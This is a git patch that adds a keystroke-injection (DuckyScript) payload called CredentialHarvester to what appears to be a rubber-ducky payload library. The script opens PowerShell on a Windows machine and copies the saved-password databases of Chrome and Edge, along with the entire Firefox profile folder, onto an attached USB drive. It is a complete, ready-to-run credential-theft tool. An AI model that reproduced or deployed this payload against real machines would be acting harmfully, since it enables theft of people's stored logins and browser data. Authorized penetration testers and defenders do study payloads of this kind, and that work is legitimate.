From ddd7d2af4b0cda805b75bfc5842f98dc76bd84c8 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 28 May 2024 23:34:46 -0400
Subject: [PATCH] Create CredentialHarvester.txt

---
 .../CredentialHarvester.txt                   | 58 +++++++++++++++++++
 1 file changed, 58 insertions(+)
 create mode 100644 payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt

diff --git a/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt b/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt
new file mode 100644
index 0000000..1c607f3
--- /dev/null
+++ b/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt
@@ -0,0 +1,58 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%                              Title: CredentialHarvester                              %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%                             Author: github.com/markcyber                             %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%                   Description: This script exfiltrates credentials                   %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%                   Target: Firefox, Chrome, Edge on Windows Machines                  %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%                                  Category: Exfiltration                              %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%      This script requires a secondary USB named "MYUSB" to save credentials to       %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM Open PowerShell with elevated privileges
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+DELAY 1000
+REM Check if the USB drive exists
+STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
+STRING if ($usbDrive -ne $null) {
+ENTER
+DELAY 500
+STRING cd $usbDrive;
+ENTER
+DELAY 500
+STRING mkdir BrowserData;
+ENTER
+DELAY 500
+STRING cd BrowserData;
+ENTER
+DELAY 500
+REM Copy Chrome Login Data to USB
+STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
+STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
+ENTER
+DELAY 500
+REM Copy Firefox Login Data to USB
+STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
+STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
+ENTER
+DELAY 500
+REM Copy Edge Login Data to USB
+STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
+STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
+ENTER
+DELAY 500
+STRING }
+ENTER
+DELAY 500
+REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
+STRING echo off | clip
+ENTER
+DELAY 500
+REM Close PowerShell
+STRING exit
+ENTER
+DELAY 500